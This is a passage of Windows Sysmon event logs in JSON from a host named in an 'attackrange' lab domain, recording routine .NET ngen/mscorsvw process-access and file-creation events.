ll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.968\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-0010755A1000}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.968","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-0010755A1000}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:26.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BE-5F25-0000-0010C22C1100}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:26.975","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BE-5F25-0000-0010C22C1100}","TargetProcessId":"4552","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.006\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001055301100}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.006","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001055301100}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.006\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001055301100}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.006","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001055301100}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8315,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.022\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001055301100}\r\nTargetProcessId: 3292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.022","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001055301100}","TargetProcessId":"3292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8316,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:27.443\r\nProcessGuid: {41C8662E-22BF-5F25-0000-001055301100}\r\nProcessId: 3292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\XamlBuildTask.dll\r\nCreationUtcTime: 2020-08-01 08:07:27.443","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:27.443","ProcessGuid":"{41C8662E-22BF-5F25-0000-001055301100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cdc-0\\XamlBuildTask.dll","CreationUtcTime":"2020-08-01 08:07:27.443","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8317,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.475\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00106D351100}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.475","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00106D351100}","TargetProcessId":"2560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.475\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00106D351100}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.475","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00106D351100}","TargetProcessId":"2560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.490\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00106D351100}\r\nTargetProcessId: 2560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.490","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00106D351100}","TargetProcessId":"2560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\S